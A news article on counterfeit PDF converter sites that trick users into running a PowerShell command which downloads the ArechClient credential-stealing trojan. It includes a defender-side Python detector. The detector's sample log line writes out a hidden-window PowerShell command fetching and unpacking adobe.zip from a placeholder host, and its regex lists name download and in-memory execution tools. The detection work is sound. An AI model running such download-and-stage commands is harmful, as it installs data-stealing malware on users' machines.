Millions rely on free PDF-to-DOCX converters for quick file format changes—but cybercriminals are now exploiting this convenience. According to cybersecurity firm CloudSEK, malicious actors are creating counterfeit file conversion websites that mimic legitimate platforms to deploy data-stealing malware.
The attack, revealed shortly after a warning from the FBI, involves fake websites that closely resemble trusted services such as pdfcandy.com. These lookalike domains—like candyxpdf.com and candyconverterpdf.com—replicate official branding and user interfaces, including logos and animated progress indicators, to deceive users.
Once users attempt to convert a PDF file, they’re presented with a captcha screen to further build trust. However, the danger lies just beyond this point. Victims are prompted to execute a PowerShell command that downloads a malicious ZIP file named adobe.zip. Inside is ArechClient, a trojan linked to the SectopRAT family—active since 2019 and capable of harvesting browser credentials, crypto wallet data, and other sensitive information.
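As an added defender-side example (not code from CloudSEK's report or this article), the following Python scans constructed Sysmon-style process-creation records for the pattern described above: a user-launched PowerShell process that both fetches a remote file and unpacks an archive or evaluates what it fetched. The record layout, file paths and the placeholder domain are assumptions; the download and staging keyword lists are mine.

```python
import re

# Constructed Sysmon-style (Event ID 1) process-creation records, one per line.
# Illustrative samples only; the domain is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -w hidden -c iwr http://converter.example.invalid/adobe.zip '
    '-OutFile $env:TEMP\\adobe.zip; Expand-Archive $env:TEMP\\adobe.zip"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -File C:\\Scripts\\backup.ps1"',
    'ParentImage=C:\\Program Files\\Vendor\\agent.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell -c Get-Process"',
    'ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe"',
]

EVENT_RE = re.compile(r'ParentImage=(?P<parent>.+?) Image=(?P<image>.+?) CommandLine="(?P<cmd>.*)"$')
# Cmdlets and .NET methods commonly used to fetch a remote file.
DOWNLOAD_RE = re.compile(r'(?i)\b(iwr|invoke-webrequest|curl|wget|downloadfile|downloadstring|start-bitstransfer)\b')
# Second stage: unpacking an archive or evaluating fetched content in memory.
STAGE_RE = re.compile(r'(?i)(expand-archive|\.zip\b|\biex\b|invoke-expression)')
HIDDEN_RE = re.compile(r'(?i)-w(indowstyle)?\s+hidden')

def basename(path: str) -> str:
    return path.replace('\\', '/').rsplit('/', 1)[-1].lower()

def parse_event(line: str):
    """Return parent, image and command line of one record, or None if malformed."""
    m = EVENT_RE.search(line)
    return m.groupdict() if m else None

def analyze(event: dict):
    """Return the indicators for a suspicious PowerShell launch, or None."""
    if basename(event['image']) not in ('powershell.exe', 'pwsh.exe'):
        return None
    cmd, indicators = event['cmd'], []
    if basename(event['parent']) == 'explorer.exe':
        indicators.append('interactive launch')  # e.g. pasted into the Run dialog
    if DOWNLOAD_RE.search(cmd):
        indicators.append('download')
    if STAGE_RE.search(cmd):
        indicators.append('staging')
    if HIDDEN_RE.search(cmd):
        indicators.append('hidden window')
    # Download plus staging is the core pattern; parent or window style alone is too noisy to alert on.
    return indicators if {'download', 'staging'} <= set(indicators) else None

def scan(lines):
    events = [parse_event(line) for line in lines]
    return {e['cmd']: analyze(e) for e in events if e and analyze(e)}
```

Only the first sample record is flagged; the scheduled backup script and the agent-spawned query share some traits but lack the download-plus-staging pair.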
Though some of these malicious sites have been removed, they reportedly attracted over 6,000 visits last month alone—highlighting the effectiveness of the ruse and the widespread risk it poses.
How to Protect Yourself:
- Verify URLs: Always double-check domain names to ensure you’re using the official website.
- Avoid Suspicious Prompts: Never run system commands or download files because an online tool tells you to; a legitimate converter has no reason to ask for either.
- Use Offline Alternatives: For sensitive documents, use trusted offline software to handle file conversions.
- React Quickly: If you suspect infection, disconnect affected devices and change all important passwords immediately.
As digital tools become more widespread, it’s crucial to stay vigilant against evolving cyber threats disguised as everyday utilities.